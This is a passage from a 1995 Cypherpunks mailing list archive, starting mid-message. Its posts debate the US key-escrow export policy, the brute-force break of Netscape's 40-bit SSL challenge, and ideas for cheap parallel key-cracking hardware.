not the current era in which the Supremes uphold random searches of bus
passengers, of high school students, etc., when "good reasons exist." It
may be that the current Supremes would uphold the ITARs.

Wait until furrin terrorists are found to be using exported crypto for some
nefarious plot...

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George P. Magiros" <libgpmx@gsusgi2.Gsu.EDU>
Date: Thu, 17 Aug 95 19:39:25 PDT
To: cypherpunks@toad.com
Subject: use PGP for http encryption instead!
Message-ID: <199508180239.WAA27731@gsusgi2.Gsu.EDU>
MIME-Version: 1.0
Content-Type: text/plain


i don't mean to be extremely brash, but couldn't one use PGP to provide
encrypted communication with the web.
granted initially everyone with a browser would need there own key to
communicate in an encrypted way - at least until such keys could be
generated on the fly.

since the http "client" format resembles rfc821 message headers and a body,
one could easily use a "hal" remailer type "Encrypted: PGP" header line
plus hash marks "::" to reassemble a compatible http client command.
The same could be done on the server side.

-george
---
libgpmx@gsusgi2.gsu.edu  (finger for PGP public key or use MIT keyserver)
George P. Magiros         Georgia State University Pullen Library 
PGP fingerprint of 59069039:  D6 76 D4 FC 9B 25 6E DD  DD 81 58 06 7B CD 03 AE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 17 Aug 95 21:08:08 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Export policy change
In-Reply-To: <9508180348.AA20354@sulphur.osf.org>
Message-ID: <Pine.ULT.3.91.950817230618.26923A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 17 Aug 1995, Rich Salz wrote:

> Just heard on the 11:30pm NPR news update.  The Clinton Administration
> has changed the crypto export policy.  You will now be allowed to
> export strong crypto, provided it is a key escrow system.  The
> reporter (Dan Charles?) said something like anyone can hold the keys,
> as long as they will be made avail when presented with a court order.
> He also said, US citizens will still be able to use strong crypto
> without key escrow internally.  Terrorists and drug pushers were given
> as "reasons."

Ok, let's escrow our keys with Julf :-)

Seriously, there might be a market for somebody to become a professional 
escrow agent....

(tongue partially in cheek)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDP2ITokqlyVGmCFAQF/JgP+Ok367e94N5E/b9IpokHpYlyFydgPzQbO
7EDzobygI3HESHro12mEYwadIShcoRRCXdMiPcuCU1G9tmDU2DoRamqIbU4dFDRk
5kEuwkJYQD+w3d+0Heebd/YwH+zpZvnlIawby1pAAPVPpzHhGkb0lFBymqrbg952
nLMzvcWt6jM=
=TPoy
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 20:29:31 PDT
To: "George P. Magiros" <libgpmx@gsusgi2.gsu.edu>
Subject: Re: use PGP for http encryption instead!
In-Reply-To: <199508180239.WAA27731@gsusgi2.Gsu.EDU>
Message-ID: <199508180329.XAA00456@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"George P. Magiros" writes:
> i don't mean to be extremely brash, but couldn't one use PGP to provide
> encrypted communication with the web.

You ought to read up on S-HTTP, the expert on said protocol being our
very own Eric Rescorla...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Date: Thu, 17 Aug 95 23:46:33 PDT
To: John Pettitt <jpp@software.net>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <Pine.3.89.9508171031.E16021-0100000@www2.software.net>
Message-ID: <Pine.SGI.3.90.950817233856.10351A-100000@challenger.atc.fhda.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 17 Aug 1995, John Pettitt wrote:
> On Wed, 16 Aug 1995, Damien Doligez wrote:
> > SSL challenge -- broken
> >               It fails on the second count.  Don't trust your credit
> >   card number to this protocol.
> 
> Huh?  So you run on 120 workstations worth how much?  to steal a credit
> card number worth how much?  Get real - there are hundreds of ways
> to get credit card numbers that cost less.  The idea is to make
> breaking SSL less attractive than dumpster diving not to make it
> impossible.   I'll lay odds that I could get the credit card number
> of *any* individual in the US in less elapsed time and with nothing
> more than a $1000 windoze machinei, a telephone and a modem.
> 
I think the point here is that its not safe to send credit cards
over the net and just like in rl, you got protect yourself by keeping
a close eye on your credit card transactions. And to prove to
our governments that RSA40 isn't a 'good enough' any more.

On the other hand getting access to 120 workstations should'nt be to
difficult for any system admin. Take my school for example, I could
run the program on some 100 odd SGI Indy workstations, 2 SGI challenge S's
and a challenger DM (2cpus) along with 2 DEC Alphas

As long as I set it to a have high nice value, nobody would notice, or even
mind. 

________________________________________________________________________
Sameer Manek                Seawolf@challenger.atc.fhda.edu         
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 17 Aug 95 20:48:23 PDT
To: cypherpunks@toad.com
Subject: Export policy change
Message-ID: <9508180348.AA20354@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Just heard on the 11:30pm NPR news update.  The Clinton Administration
has changed the crypto export policy.  You will now be allowed to
export strong crypto, provided it is a key escrow system.  The
reporter (Dan Charles?) said something like anyone can hold the keys,
as long as they will be made avail when presented with a court order.
He also said, US citizens will still be able to use strong crypto
without key escrow internally.  Terrorists and drug pushers were given
as "reasons."
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 00:53:53 PDT
To: shank@netscape.com (Peter Shank)
Subject: Re:  Netscape security
Message-ID: <199508180750.AAA27087@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Shank - I'm a bit disappointed by your posting about the RC4-40 crack.

>Late Tuesday evening a person from France posted a news article to the
>hacker community claiming success at decrypting a single encrypted message
(You could have used his name, and use of the term "hackers" to the press
tends to be interpreted as a negative...)  Anyway, as to content:

>What this person did is decrypt one encrypted message that used RC4-40 for
>encryption. He used 120 workstations and two parallel supercomputers for 8
>days to do so.
"Two" parallel supercomputers?  You can't really call the Encore Multimax
or the Sequent B8000 a supercomputer - both of them together are slower than
the HP workstation.  The KSR gets closer to supercomputer territory, but
it's only
cracking keys about six times as fast as the faster DEC Alpha (which Damien
only had one of); it increased his horsepower about 20% for two days.

Now, I can see calling a MasPar a "parallel supercomputer"; another effort
at the SSL challenge got the answer about 2 hours before Damien's did,
and used about 4 days of spare time on the MasPar.  Last time I looked,
a MasPar was selling for about $150K, though I don't know how big the one
used on SSL was.  At that price, you could have your own for ~$500/day,
and ripping off $2000 on a credit card isn't tough in today's automated world.
Next year - computer time costs half as much.

Yes, it's still cheaper to get good credit card numbers by scamming carbons
at a mall clothing store or yuppie restaurant, but computer networks let
criminals run their scams wholesale, putting the public at risk both from
organized criminals with their own equipment and any dishonest college
student or office worker who's got a roomful of idle computers to use at night.

Trading off the cost of breaking security vs. the value to be gained is
a good start - lots of people have $2000 of credit limit left on their cards,
and most people have more than $0 left.


> This level of security has been available in the
>U.S. versions of our products since last April. Because of export controls
>it has not been available outside the U.S. We would appreciate your support
>in lobbying the U.S. government to lift the export controls on encryption.
>If you'd like to help us lobby the government send email to
>export@netscape.com.

Thanks for working on this!

                                Bill Stewart

==================== The list of computers ===========================
type                  speed (keys/s)    number     notes
- --------------------------------------------------------
DEC (alpha)           18000-33000        34
DEC (MIPS)            2500-7500          11
SPARC                 2000-13000         57
HP (HPPA/snake)       15000              3
Sony (R3000)          1100-4000          3
Sun 3                 600                2
Sequent B8000         100 x 10           1         (1)
Multimax (NS532)      600 x 14           1         (1)
KSR                   3200 x 64          1         (1) (2)

Notes:
1.  These are multiprocessor machines
2.  The KSR spent only about 2 days on this computation.

The total average searching speed was about 850000 keys/s,
with a maximum of 1350000 keys/s (1150000 without the KSR).
====================================================================
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 18 Aug 95 00:53:55 PDT
To: Lile Elam <lile@art.net>
Subject: Re: (event 8/17)  panel on the Net:Privacy, Security, and Parental Control
Message-ID: <199508180751.AAA27094@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:10 PM 8/14/95 -0700, you wrote:
>Perhaps some of us should be here to keep things in perspective.

Thanks; it was an interesting panel.  I missed the first half hour,
since traffic was appalling :-), but got to the rest; maybe an hour of
panel discussion and 15 minutes of organized q&a, then wine&cheese.  
Just about everybody was concerned about pornography on the net, and thought
that the government had no clue what they were doing and shouldn't be
regulating it;
most thought that the whole issue was really a smokescreen for the government
wanting to regulate the nets and especially interstate commerce 
("Hmm, we tried scaring everybody about terrorists on the net, that fizzled,
let's scare them about porn and their kids - that always works!").  
About half the panel had kids between 4 and 15.

Lots of concern about media concentration and how this is
currently the only widely accessible medium for 1:N communications
so it's a target.  Some interesting discussions about changes in society
and our relationships with other people that come from net-style communications
and artificiality - Mark Slouka was mainly taking the side of "this is different
and I'm not sure I like it, and the fact that people are desperately seeking
community through this virtual stuff says our communities out in the real world
are probably having some real crises", with interesting thought behind it.

PGN brought in some RISKS stuff, including the how-rumors-spread dynamics;
he also talked a bit about cryptography (he's on that national policy review),
somewhat from the perspective of "it's an international problem and trying
to do things within national borders is ineffective" - I'm not sure he's
on our side here though he's at least clueful.

Dan Gillmor had some good perspectives on objectivity in reporting -
the news business knows it's not objective, and he's at least concerned
with trying to be fair and balanced and as quick as possible about
correcting mistakes, but then he edits the SJMerc business page so it's a
lot clearer what "mistakes" are than in, say, political reporting.

>>    * George Baldwin, California State University, Monterey Bay
George Baldwin is involved with the IndianNet project, putting things like
Native American artwork on the Web, including for sale.  He brought up some
cultural perspectives - a lot of people have been viewing it, but Native
Americans
don't actually _buy_ much of it because they tend to view artwork as personal
and want to know the artist and what it means to him/her, and the net doesn't
do that very well.  If you haven't heard of CSU Monterey Bay, it's opening RSN.

>>    * Bill Bauriedel,Stanford University
He's on an inter-university study to address things like how to do
on-line registration while preserving privacy (doesn't like export
laws at all.)
>>    * Dan Gillmor, San Jose Mercury News
>>    * Richard Gingras, Apple
Manages E-World and some network things.
>>    * Peter Neumann, SRI
>>    * Craig Newmark, Digital Threads
Used to wear plastic pocket protectors when he was younger :-)
Consults to big companies that need clues.
>>    * Mark Slouka, University of California, San Diego
One of the liberal arts types on the panel.  Either he or George Baldwin 
was talking about college students learning creative writing on MUDs and MOOs.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Thu, 17 Aug 95 15:55:33 PDT
To: cypherpunks@toad.com
Subject: Re: WANTED: anonymous remailer source code
Message-ID: <199508172255.AA02942@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Quazi sez:

: I'm interested in porting some remailer code to work on NT (most
: likely using NTMail as the smtp service). I'd like to be sure I'm
: starting my port from the most recent revisions, and the sources at
: the archive at berkeley seem a bit dated. Are they the latest sources?
: Are there more recent sources available somewhere?

Try ftp.hacktic.nl:/pub/remailer

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 17 Aug 95 22:02:12 PDT
To: cypherpunks@toad.com
Subject: Re: I need exportable crypto revisited.
Message-ID: <199508180458.AAA11401@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199508180030.RAA04988@mycroft.rand.org>, jim@acm.org (Jim
Gillogly) wrote:

>> "Perry E. Metzger" <perry@piermont.com> writes:
>> If you have hooks for arbitrary encryption, you will find it to be
>> virtually impossible to export the product.
>
>That's my understanding also (as I told him in e-mail) but I haven't found
>any legal justification for it. 

You migh as well stop looking, because there isn't any. The brownshirts
have long ago decided that the law means what they say it does. Welcome to
reality.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDQd8ioZzwIn1bdtAQGyEwF9HHGf5vVL0EbVt7RVrXwLlQQUGLF+nFEl
+KP+YB4/JYjjvE9G8By7RlezFhZF3Iy6
=MRsO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Thu, 17 Aug 95 22:49:38 PDT
To: cypherpunks@toad.com
Subject: Cheap Brute Force Attacks
Message-ID: <199508180547.BAA15638@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


The use of idle cycles on workstations or PCs for brute force attacks
made me think about the economics of this problem. How cheaply could
a massively parallel system be built for key cracking? Much of the
cost and complexity of current massively parallel systems is in
the inter-processor communications and memory systems. Why not build
a system with a large number of single chip processors (ROM/RAM/IO on
one chip) and a simple/slow/cheap communication bus? I'm assuming that
each processor can attack a small chunk of the keyspace without needing
any external support. One or more PC boards could be populated with
an array of cheap processors. There would be a master controller to
assign chunks of key space and check for results. It could also download
the software if it was to be stored in on-chip RAM. A PC board could
be designed that would provide 5V power, a shared serial I/O bus and
a wired-or interrupt for the microprocessors to signal the master
controller that a key has been cracked. What would be a good microprocessor
for this task? It would have to be cheap, reasonably low power with
lots of integer MIPS. A decent amount of on-chip RAM would allow the
software to be downloaded instead of being masked or burned into ROM.
1000 processors could be put into a relatively small box, lets say
10 boards each containing 100 single chip microprocessors. It shouldn't
cost more than $10-$20 per processor, about the same total cost as
one decent workstation ($10K-$20K).


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 17 Aug 95 23:14:19 PDT
To: cypherpunks@toad.com
Subject: Where is the key cracking farming software?
Message-ID: <199508180611.CAA11918@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

With all the talk about cracking SSL, where is the cracking software?
Sombody just offered me a six Pentium workstation, if I agree to give it a
"real workout". I'd like to be able to say: "Sure, will do."

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDQu2yoZzwIn1bdtAQF+iAF/WrvfsHBTRhh8fYfWENS0oxOUagl1GrBo
PMeo+yJOa7/CN5/pl0xQTFUdusijXqxO
=DiNO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 18 Aug 95 03:36:25 PDT
To: cypherpunks@toad.com
Subject: Key escrow agent
Message-ID: <9508181035.AA01820@all.net>
MIME-Version: 1.0
Content-Type: text


Management Analytics is proud to announce it's key escrow agency.
We will escrow keys for only US$1 per key.  Please send your keys
to us along with your $1 check or money order.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 18 Aug 95 03:57:23 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Non-News Govt Announcement on Key Escrow
Message-ID: <199508181055.GAA23407@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:

<beginning snipped>

>any mandatory key escrow system is not only a
>massive infringement on the right of people to speak and communicate as
>they wish, it is also handing the keys to the Surveillance State to the
>likes of Bob Dole, Jesse Helms, Alonse D'Amato, Newt Gingrich, and William
>Bennett.

You left out Mr. Perot, who has a pench
nt for investigation [and even
"operations" ] with his own family, business & money, and has not ruled
out another run for the presidency this time.

Imagine this authoritarian statist in charge of the whole alphabet
of U.S. intelligence agencies run by *tax* money...
Chilling! [I would ordinarily make an "all ears" joke now.] <g>

...

On another subject, NPR announcement confirmed at 6:38AM today.
Key "escrow" with a private company [exact qualifications undefined,
but amenable to service of search warrants] but export of stronger
crypto now permitted. No U.S. key escrow for unexported cryptography
[yet]. <sigh>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDRvYm1lp8bpvW01AQFotwP+LITpSdGjRuyBdTqP7n70HrkmsMAPqeK0
MQgOVqbmDT4N8KwLP80UIkCIRqSBXFq4aOTEld+ImCRhN4ivfmAd332DaPbhCXS6
nvEJXfXli6KumaSMLQjmFRfIvcgAHz5Y7NELpHDnI+gjKgixWPEZd7/8r7eL3uhh
UUovA9OLiWk=
=LOEF
-----END PGP SIGNATURE-----
Regards, Jim Ray

"The important thing is not to stop questioning. Curiosity has its
own reason for existing. One cannot help but be in awe when he
contemplates the mysteries of eternity, of life, of the marvelous
structures of reality. It is enough if one merely tries to comprehend
a little of this mystery every day. Never lose a holy curiosity."
 -- Albert Einstein
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Aug 95 04:22:20 PDT
To: cypherpunks@toad.com
Subject: NYT on Crypto Policy
Message-ID: <199508181122.HAA06682@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, August 18, 1995, pp. D1, D6.


   U.S. to Urge A New Policy On Software

   Affempt at Compromise On Scrambling of Data

   By John Markoff


   The Clinton Administration broke a year of silence on its
   data-scrambling policy yesterday by saying it would soon
   propose an alternative to the Government's so-called Clipper
   Chip system, which has been widely criticized by makers and
   users of computer technology.

   The Administration announcement is an attempt to reach a
   compromise with American corporations on a software coding
   system that would protect the privacy of communication over
   computer networks while still permitting court-authorized
   wiretaps and eavesdropping by law enforcement officials.

   Critics of the Clipper Chip have opposed it because the
   Government refused to allow public examination of the
   underlying technology to make sure there were no secret
   backdoors that might allow unauthorized spying.
   Privacy-rights advocates attacked the policy because it
   called for a Government agency to hold a numeric key to
   each user's code. And technology executives have opposed
   the Government's data-scrambling policy because it
   restricts export of other types of data-security systems,
   which is seen as an impediment to sales of American
   computer products overseas.

   Officials of the Commerce Department's National Institute
   of Standards and Technology, which administers the data-
   scrambling standard, said yesterday that the Government
   would convene a workshop on Sept. 6 and 7 to discuss the
   new proposal. The topics include a proposal to relax the
   export policy and discussion of an alternative to Clipper
   technology that would be more palatable to industry
   executives.

   Industry officials had written two weeks ago to Vice
   President Al Gore, calling for resumption of talks that had
   broken off last year. In the talks last year industry
   leaders had met with Government officials to seek Clipper
   Chip alternatives.

   "I think that moving ahead with industry dialogue is
   positive," Robert W. Holleyman 2d, president of the
   Business Software Alliance, said yesterday. The alliance is
   a group of the industry's largest software companies,
   including Microsoft, Lotus and Novell. "But much more needs
   to be fleshed out," Mr. Holleyman said.

   One big criticism of the Clipper policy was the proviso
   that a Government agency would hold, in escrow, a decoding
   key that law-enforcement officials could obtain after
   receiving a court's authorization. The new proposal would
   still include a provision for holding keys in escrow, but
   Government officials said they were now willing to discuss
   letting non-Government escrow agents hold the keys.

   Later in September, the Government will hold a second
   workshop to discuss Federal standards for software coding
   systems that could then be used as an alternative to
   Clipper and a related technology called Capstone. In an
   attempt to establish Clipper and Capstone as de-facto
   industry standards, the original policy mandated that
   computer and communications systems sold to the Federal
   Government must contain Clipper or Capstone hardware.

   But the new approach might allow computer and
   communications companies to sell products to the Government
   that achieved the same privacy protection through software-
   only means. That would relieve companies doing business
   with the Government of the obligation to invest in Clipper
   and Capstone technologies that might not find buyers in the
   commercial marketplace.

   Another criticism of the Government s policy has been its
   longstanding export rules, which have put strict limits on
   the export of software containing data-encoding
   capabilities. The assumption has been that the Government's
   electronic spies, the National Security Agency, would be
   able to break codes with keys of 40 bits or shorter. But
   now the Government will consider allowing export of coding
   systems with keys up to 64 bits long -- on the condition
   that decoding keys be held in escrow for access by
   authorized law-enforcement officials.

   "This is definitely a compromise," said Ray Kammer, the
   deputy director of the National Institute of Standards and
   Technology. "During the past year we've had a pretty
   spirited debate about the possibility of a 64-bit software
   key-escrow system. Law enforcement people had to get used
   to the notion it might be possible to do this."

   The vulnerability of 40-bit systems was underscored two
   days ago. A French student decoded a message that had been
   encoded using the 40-bit security feature in the European
   version of the Netscape Communications Corporation software
   for navigating the Internet's World Wide Web service.

   The student, Damien Doligez, at Ecole Polytechnique, a
   French engineering and sciences college, used 120 computers
   in a campus network to simultaneously test every key
   possible in a short period. It took him eight days, but he
   was able to decode a single encoded Netscape message. Mr.
   Doligez announced his achievement on the Internet.

   Yesterday, Netscape issued a statement saying that the
   version of its software distributed in the United States
   supports 128-bit keys, which the company said would require
   more than one trillion times the computing power the French
   student used to decode the message.

   Despite the industry's tentative willingness to accept a
   key-escrow coding plan, civil liberties organizations and
   other computer experts said that escrow techniques made
   little sense in light of the fact that private individuals
   might use any kind of coding system they wished to exchange
   information domestically. Encoding systems without escrow
   keys are also widely available overseas.

   "How does key escrow accomplish what the Government has set
   out to do?" asked David Sobel, legal counsel for the
   Electronic Privacy Information Center, a Washington D.C.
   public interest group. "Nonescrowed encryption is out
   there," he said. "And for the concerns law and enforcement
   and intelligence have, the problem remains and it will
   remain under this policy."

   [End]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 18 Aug 95 04:32:11 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
Message-ID: <v02120d02ac5a26d62a7a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 AM 8/18/95, Timothy C. May wrote:

>My neighbor has agreed to be the escrow agent for my keys. He doesn't know
>anything about computers, so he's taking my word that the things I give him
>every couple of months are disks. He figures that if the Justice Department
>ever asks for them, he'll point to the dusty box on the floor of his garage
>and say, "There they be."

You wouldn't want them to get *dusty*, Tim. Why not embed them in something
like epoxy, better, Lexan, to protect them from the elements? Say about a
foot thick in all directions... Should make sure the media itself is
sufficiently coated too. Don't want the little electrons getting hurt, you
know...

I see a market opportunity here. Time to buy DuPont stock. I hear it's been
depressed lately.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Fri, 18 Aug 95 04:54:25 PDT
To: cypherpunks@toad.com
Subject: Exportable if Escrowed Changes Nothing!
Message-ID: <199508181152.HAA57449@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


C-punks:

This "change" that encryption software can be exported if the keys are
escrowed means nothing.  PGP still couldn't be exported, since it can
generate its own keys.  You can be sure that any program that generates
its own keys couldn't be exported.  How are you going to escrow 2^100
possible keys (or whatever it is that PGP can generate)?

Thus, this regulatory change means diddly-squat.  The only crypto that 
could be exported would be something like Clipper, and they already said
that could be exported.

Governments:  can't live with 'em, can't shoot 'em.

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 18 Aug 95 05:00:32 PDT
To: tcmay@got.net>
Subject: Re: Non-News Govt Announcem
Message-ID: <n1403389714.2970@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


It seems more likely that the opposite will occur: Clinton has been pandering
for the police vote so strongly that he's more likely to come up with more
draconian proposals to curry their favor.

-d

--------------------------------------
Date: 8/17/95 11:47 PM
To: Dave Banisar
From: Timothy C. May
At 9:49 PM 8/17/95, Dave Banisar wrote:
>The White House and NIST annouced today that they were planning to hold two
>open meetings next month to develop standards for "acceptable" software key
>escrow.  The standards will then be made into a FIPS. The programs cannot
>have keys larger than 64 bits.
>
>Its great to see that it only took them 18 months (since Feb. 94) to come
>up with a call for public meetings for something that nobody really wants
>anyway, expcept for the officals who plan to make it mandatory by slipping
>it through bit by bit and a couple of vendors.  (sorry, sarcasm mode
>off...)

One thing I'm hoping for is that Clinton will, as he contemplates his last
year and a bit in office, have an attack of "liberalism." That is, I am
hoping he realizes that any mandatory key escrow system is not only a
massive infringement on the right of people to speak and communicate as
they wish, it is also handing the keys to the Surveillance State to the
likes of Bob Dole, Jesse Helms, Alonse D'Amato, Newt Gingrich, and William
Bennett.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."



------------------ RFC822 Header Follows ------------------
Received: by epic.org with SMTP;17 Aug 1995 23:40:49 U
Received: from [205.199.118.202] (tcmay.sensemedia.net [205.199.118.202]) by
buckeye.sensemedia.net (8.6.9/8.6.9) with SMTP id UAA05708; Thu, 17 Aug 1995
20:47:55 -0700
Date: Thu, 17 Aug 1995 20:47:55 -0700
X-Sender: tcmay@mail.got.net
Message-Id: <ac595a311502100481c2@[205.199.118.202]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Priority: 1 (Highest)
To: banisar@epic.org (Dave Banisar), cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Re: Non-News Govt Announcement on Key Escrow




_________________________________________________________________________
Subject: RE>>Non-News Govt Announcement on...
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  * ftp/gopher/wais cpsr.org 
Washington, DC 20003                * HTTP://epic.digicash.com/epic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 18 Aug 95 08:34:20 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: Netscape security
In-Reply-To: <9508181509.AA01916@joplin.harvard.edu>
Message-ID: <199508181529.IAA01360@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	The certificates must be signed by an approved key signing
> agency.  Anyone can produce one; to get it to interact 'securely' with
> free netscape browsers you need the certificate to be signed.
> 
> 	There is no word as to how to become a KSA.  Netscpe has
> ignored the question on several occaisons.
> 

	It is interesting that in order for me to use the commerce
server on an *internal* application I am working on, my project
*still* needed to get the key signed by verisign, even though no one
outside of the company i am working for will have access to the
commerce server my application is running on.

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 18 Aug 95 05:34:06 PDT
To: jgrasty@gate.net
Subject: Re: Exportable if Escrowed Changes Nothing!
In-Reply-To: <199508181152.HAA57449@tequesta.gate.net>
Message-ID: <9508181232.AA06225@all.net>
